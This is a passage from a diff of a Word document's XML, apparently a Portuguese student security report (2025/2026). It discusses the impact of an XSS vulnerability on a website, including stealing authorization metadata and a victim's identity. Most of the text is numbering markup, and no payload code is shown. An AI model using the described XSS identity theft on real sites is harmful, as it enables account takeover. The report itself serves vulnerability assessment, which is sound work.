+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>s possiveis informações de autorização/metadados</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e mais do que isso, roubar e manipular a identidade da vitima</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7205415E" wp14:editId="15157DD0">
+            <wp:extent cx="5400040" cy="3752850"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1966109280" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1966109280" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5400040" cy="3752850"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-BR"/>
+        </w:rPr>
+        <w:t>A vulnerabilidade de XSS já é bastante reconhecida e já existem bastantes ferramentas no mercado que ajudam a prevenir a mesma, os impactos causados numa aplicação real seriam devastadores para o quão simples um malfeitor é capaz de utilizar a vulnerabilidade exposta neste website. Outros casos reais causaram impactos de grande risco à empresa devido à sensibilidade dos dados que foram expostos.</w:t>
+      </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId15"/>
+      <w:headerReference w:type="default" r:id="rId22"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1417" w:right="1701" w:bottom="1417" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -5870,13 +8255,7 @@
       <w:rPr>
         <w:lang w:val="pt-PT"/>
       </w:rPr>
-      <w:t>-SI (2025/2026)</w:t>
-    </w:r>
-    <w:r>
-      <w:rPr>
-        <w:lang w:val="pt-PT"/>
-      </w:rPr>
-      <w:t xml:space="preserve"> – </w:t>
+      <w:t xml:space="preserve">-SI (2025/2026) – </w:t>
     </w:r>
     <w:r>
       <w:rPr>
@@ -5897,6 +8276,127 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="05CD36F0"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="214261B6"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="1440"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="2160"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="2520"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="10B81914"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="78DAC1EA"/>
@@ -6009,7 +8509,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="10BD581F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E7DA50BC"/>
@@ -6122,7 +8622,217 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="184D7C12"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="214261B6"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="1440"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="2160"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="2520"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="191204D7"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="A176A4C4"/>
+    <w:lvl w:ilvl="0" w:tplc="0809000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1E9C72C0"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="212E6CEA"/>
@@ -6235,7 +8945,185 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="201D378E"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="A864A3E6"/>
+    <w:lvl w:ilvl="0" w:tplc="0809000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="288B2403"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="E126F2D6"/>
+    <w:lvl w:ilvl="0" w:tplc="0809000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2E0E0C36"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="45D0D042"/>
@@ -6348,7 +9236,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="321228C0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="214261B6"/>
@@ -6469,20 +9357,715 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="411D4876"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="214261B6"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="1080"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="1440"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="1800"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:isLgl/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="2160"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
